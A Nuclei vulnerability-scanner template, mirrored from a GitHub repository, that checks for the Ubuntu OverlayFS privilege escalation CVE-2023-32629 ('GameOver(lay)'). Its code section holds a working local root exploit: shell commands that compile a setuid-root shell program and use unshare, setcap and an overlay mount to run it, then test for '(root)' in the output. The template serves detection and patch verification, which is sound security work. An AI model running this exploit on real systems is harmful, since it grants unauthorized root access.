daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
nuclei-templates/code/cves/2023/CVE-2023-32629.yaml

53 lines
2.3 KiB
YAML
Raw Blame History

id: CVE-2023-32629
info:
name: GameOver(lay) - Local Privilege Escalation in Ubuntu Kernel
author: princechaddha
severity: high
description: |
A local privilege escalation vulnerability has been discovered in the OverlayFS module of the Ubuntu kernel. This vulnerability could allow an attacker with local access to escalate their privileges, potentially gaining root-like access to the system.
reference:
- http://packetstormsecurity.com/files/174577/Kernel-Live-Patch-Security-Notice-LSN-0097-1.html
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-32629
- https://lists.ubuntu.com/archives/kernel-team/2023-July/140920.html
- https://ubuntu.com/security/notices/USN-6250-1
remediation: |
Apply the latest security patches and updates provided by Ubuntu to fix the vulnerability.
classification:
cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 7.8
cve-id: CVE-2023-32629
cwe-id: CWE-863
cpe: cpe:2.3:o:canonical:ubuntu_linux:23.04:*:*:*:*:*:*:*
epss-score: 0.00042
metadata:
max-request: 2
product: ubuntu_linux
vendor: canonical
verified: true
tags: cve,cve2023,kernel,ubuntu,linux,privesc,local
self-contained: true
code:
- engine:
- sh
- bash
source: |
id
- engine:
- sh
- bash
source: |
cd /tmp
echo '#include <stdio.h>\n#include <stdlib.h>\n#include <unistd.h>\n\nint main() {\n if (setuid(0) != 0) {\n fprintf(stderr, "\\x1b[31mFailed to set UID to 0.\\x1b[0m\\n");\n return 1;\n }\n\n printf("Entering \\x1b[36mprivileged\\x1b[0m shell...\\n");\n if (system("/bin/bash -p") == -1) {\n fprintf(stderr, "\\x1b[31mFailed to execute /bin/bash -p.\\x1b[0m\\n");\n return 1;\n }\n\n return 0;\n}' > test.c
gcc test.c -o test
unshare -rm sh -c "mkdir -p l u w m && cp test l/ && setcap cap_setuid+eip l/test && mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/test && u/test && id;"
matchers:
- type: dsl
dsl:
- '!contains(code_1_response, "(root)")'
- 'contains(code_2_response, "(root)")'
condition: and
# digest: 4a0a00473045022100cc36ed65fa01fe534699e2db622f418a3bb9470edd14eca1eba3138a2daebd4802207b1222e3e2dd3f5701821bab6d24e5cb9976223561e411372df8a2be3a71253c:922c64590222798bb761d5b6d8e72950
Reference in New Issue View Git Blame Copy Permalink